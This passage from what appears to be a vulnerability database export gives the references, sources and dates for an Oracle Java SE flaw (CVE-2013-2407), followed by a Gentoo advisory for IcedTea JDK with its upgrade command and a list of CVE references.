"http://www-01.ibm.com/support/docview.wss?uid=swg21663199" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21648416" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21648418" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21648416" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21648418" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21650778" }, { "trust": 0.3, "url": "http://www.xerox.com/download/security/security-bulletin/12047-4e4eed8d42ca6/cert_xrx13-007_v1.0.pdf" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2451" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2443" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2452" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2412" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2447" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1571" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2449" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2465" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2472" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2456" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2458" }, { "trust": 0.2, "url": "http://www.mandriva.com/en/support/security/" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2445" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2455" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2446" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2407" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2460" }, { "trust": 0.2, "url": "http://www.mandriva.com/en/support/security/advisories/" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1500" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2470" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2459" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2457" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2444" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2463" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2453" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2448" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2454" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2450" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2469" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2473" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2461" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2471" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2473" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/1907-1/" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=29704" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2013-1014.html" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2451" }, { "trust": 0.1, "url": "http://www.debian.org/security/faq" }, { "trust": 0.1, "url": "http://www.debian.org/security/" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openjdk-7/7u25-2.3.10-1ubuntu0.13.04.2" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openjdk-7/7u25-2.3.10-1ubuntu0.12.10.2" }, { "trust": 0.1, "url": "http://www.ubuntu.com/usn/usn-1907-1" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2468.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-1540.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-1476.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2463.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2446.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-3342" }, { "trust": 0.1, "url": "https://access.redhat.com/site/articles/11258" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-1500.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0428.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-1480.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2419.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-4823" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0401.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2444.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0425.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2454.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-5089.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-1722.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-5079.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0419.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2422.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-1721.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-5081.html" }, { "trust": 0.1, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0409.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-5071.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0423.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-1532.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-3216.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-5069.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-3143" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1541" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-5084.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0443.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2451.html" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/key/#package" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0809.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-1487.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0351.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1719" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1533" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-4820.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0427.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-1569.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0433.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-1493.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-5073.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-4823.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2435.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2456.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-3743.html" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#low" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2407.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2470.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-5068.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-4822" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-3216" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0547" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-1541.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5068" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-4822.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-3159.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-1557.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1725" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1532" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-5075.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2471.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2429.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-3213" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5069" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2443.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0551" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-1713.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-3213.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0441.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2457.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2412.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-5072.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-1718.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0432.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0446.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-4820" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-1481.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-1537.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-1717.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-1531.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2432.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2447.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2452.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0450.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-1491.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2464.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-1571.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2383.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1717" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2418.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-1473.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-0547.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-1563.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2465.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2472.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1722" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2466.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2424.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2453.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1716" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2473.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2433.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2437.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-1716.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-5083.html" }, { "trust": 0.1, "url": "http://bugzilla.redhat.com/):" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-1533.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-3342.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0426.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2450.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1718" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-3143.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0440.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1531" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-1725.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2417.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0445.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2394.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2455.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-1682.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2442.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2459.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5071" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1713" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2430.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5072" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0442.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-0551.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0424.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1682" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2448.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-1719.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-1486.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1721" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2384.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0169.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-3159" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2469.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0438.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5073" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-1478.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0435.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0434.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2420.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2440.html" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhba-2013-0959.html" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2013-0957.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2464" }, { "trust": 0.1, "url": "http://www.hp.com/java" }, { "trust": 0.1, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2400" }, { "trust": 0.1, "url": "https://www.hp.com/go/swa" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2437" }, { "trust": 0.1, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/" }, { "trust": 0.1, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2462" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2442" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openjdk-6/6b27-1.12.6-1ubuntu0.10.04.2" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openjdk-6/6b27-1.12.6-1ubuntu0.12.04.2" }, { "trust": 0.1, "url": "http://www.ubuntu.com/usn/usn-1908-1" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-3743" } ], "sources": [ { "db": "VULMON", "id": "CVE-2013-2407" }, { "db": "BID", "id": "60653" }, { "db": "PACKETSTORM", "id": "122422" }, { "db": "PACKETSTORM", "id": "122423" }, { "db": "PACKETSTORM", "id": "122438" }, { "db": "PACKETSTORM", "id": "123735" }, { "db": "PACKETSTORM", "id": "122189" }, { "db": "PACKETSTORM", "id": "122651" }, { "db": "PACKETSTORM", "id": "122522" }, { "db": "CNNVD", "id": "CNNVD-201306-295" }, { "db": "NVD", "id": "CVE-2013-2407" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2013-2407" }, { "db": "BID", "id": "60653" }, { "db": "PACKETSTORM", "id": "122422" }, { "db": "PACKETSTORM", "id": "122423" }, { "db": "PACKETSTORM", "id": "122438" }, { "db": "PACKETSTORM", "id": "123735" }, { "db": "PACKETSTORM", "id": "122189" }, { "db": "PACKETSTORM", "id": "122651" }, { "db": "PACKETSTORM", "id": "122522" }, { "db": "CNNVD", "id": "CNNVD-201306-295" }, { "db": "NVD", "id": "CVE-2013-2407" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2013-06-18T00:00:00", "db": "VULMON", "id": "CVE-2013-2407" }, { "date": "2013-06-18T00:00:00", "db": "BID", "id": "60653" }, { "date": "2013-07-16T03:45:16", "db": "PACKETSTORM", "id": "122422" }, { "date": "2013-07-16T03:46:50", "db": "PACKETSTORM", "id": "122423" }, { "date": "2013-07-17T00:03:49", "db": "PACKETSTORM", "id": "122438" }, { "date": "2013-10-23T22:58:21", "db": "PACKETSTORM", "id": "123735" }, { "date": "2013-06-27T22:37:01", "db": "PACKETSTORM", "id": "122189" }, { "date": "2013-08-02T15:05:49", "db": "PACKETSTORM", "id": "122651" }, { "date": "2013-07-24T01:34:03", "db": "PACKETSTORM", "id": "122522" }, { "date": "2013-06-19T00:00:00", "db": "CNNVD", "id": "CNNVD-201306-295" }, { "date": "2013-06-18T22:55:01.397000", "db": "NVD", "id": "CVE-2013-2407" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-01-05T00:00:00", "db": "VULMON", "id": "CVE-2013-2407" }, { "date": "2017-08-11T20:11:00", "db": "BID", "id": "60653" }, { "date": "2022-05-16T00:00:00", "db": "CNNVD", "id": "CNNVD-201306-295" }, { "date": "2022-05-13T14:53:00.540000", "db": "NVD", "id": "CVE-2013-2407" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "122651" }, { "db": "CNNVD", "id": "CNNVD-201306-295" } ], "trust": 0.7 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Oracle Java SE JRE Unknown security vulnerability", "sources": [ { "db": "CNNVD", "id": "CNNVD-201306-295" } ], "trust": 0.6 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Unknown", "sources": [ { "db": "BID", "id": "60653" } ], "trust": 0.3 } }
var-201306-0238
Vulnerability from variot
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 21 and earlier and 6 Update 45 and earlier; the Oracle JRockit component in Oracle Fusion Middleware R27.7.5 and earlier and R28.2.7 and earlier; and OpenJDK 7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Libraries. NOTE: the previous information is from the June and July 2013 CPU. Oracle has not commented on claims from another vendor that this issue allows remote attackers to bypass verification of XML signatures via vectors related to a "Missing check for [a] valid DOMCanonicalizationMethod canonicalization algorithm.". The vulnerability can be exploited over multiple protocols. This issue affects the 'Libraries' sub-component. This vulnerability affects the following supported versions: 7 Update 21 , 6 Update 45. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201406-32
http://security.gentoo.org/
Severity: High Title: IcedTea JDK: Multiple vulnerabilities Date: June 29, 2014 Bugs: #312297, #330205, #340819, #346799, #352035, #353418, #354231, #355127, #370787, #387637, #404095, #421031, #429522, #433389, #438750, #442478, #457206, #458410, #461714, #466822, #477210, #489570, #508270 ID: 201406-32
Synopsis
Multiple vulnerabilities have been found in the IcedTea JDK, the worst of which could lead to arbitrary code execution.
Background
IcedTea is a distribution of the Java OpenJDK source code built with free build tools.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-java/icedtea-bin < 6.1.13.3 >= 6.1.13.3
Description
Multiple vulnerabilities have been discovered in the IcedTea JDK. Please review the CVE identifiers referenced below for details.
Workaround
There is no known workaround at this time.
Resolution
All IcedTea JDK users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev-java/icedtea-bin-6.1.13.3"
References
[ 1 ] CVE-2009-3555 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3555 [ 2 ] CVE-2010-2548 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2548 [ 3 ] CVE-2010-2783 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2783 [ 4 ] CVE-2010-3541 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3541 [ 5 ] CVE-2010-3548 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3548 [ 6 ] CVE-2010-3549 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3549 [ 7 ] CVE-2010-3551 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3551 [ 8 ] CVE-2010-3553 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3553 [ 9 ] CVE-2010-3554 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3554 [ 10 ] CVE-2010-3557 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3557 [ 11 ] CVE-2010-3561 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3561 [ 12 ] CVE-2010-3562 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3562 [ 13 ] CVE-2010-3564 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3564 [ 14 ] CVE-2010-3565 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3565 [ 15 ] CVE-2010-3566 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3566 [ 16 ] CVE-2010-3567 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3567 [ 17 ] CVE-2010-3568 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3568 [ 18 ] CVE-2010-3569 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3569 [ 19 ] CVE-2010-3573 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3573 [ 20 ] CVE-2010-3574 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3574 [ 21 ] CVE-2010-3860 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3860 [ 22 ] CVE-2010-4351 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4351 [ 23 ] CVE-2010-4448 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4448 [ 24 ] CVE-2010-4450 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4450 [ 25 ] CVE-2010-4465 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4465 [ 26 ] CVE-2010-4467 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4467 [ 27 ] CVE-2010-4469 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4469 [ 28 ] CVE-2010-4470 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4470 [ 29 ] CVE-2010-4471 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4471 [ 30 ] CVE-2010-4472 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4472 [ 31 ] CVE-2010-4476 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4476 [ 32 ] CVE-2011-0025 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0025 [ 33 ] CVE-2011-0706 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0706 [ 34 ] CVE-2011-0815 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0815 [ 35 ] CVE-2011-0822 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0822 [ 36 ] CVE-2011-0862 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0862 [ 37 ] CVE-2011-0864 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0864 [ 38 ] CVE-2011-0865 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0865 [ 39 ] CVE-2011-0868 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0868 [ 40 ] CVE-2011-0869 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0869 [ 41 ] CVE-2011-0870 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0870 [ 42 ] CVE-2011-0871 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0871 [ 43 ] CVE-2011-0872 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0872 [ 44 ] CVE-2011-3389 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3389 [ 45 ] CVE-2011-3521 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3521 [ 46 ] CVE-2011-3544 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3544 [ 47 ] CVE-2011-3547 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3547 [ 48 ] CVE-2011-3548 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3548 [ 49 ] CVE-2011-3551 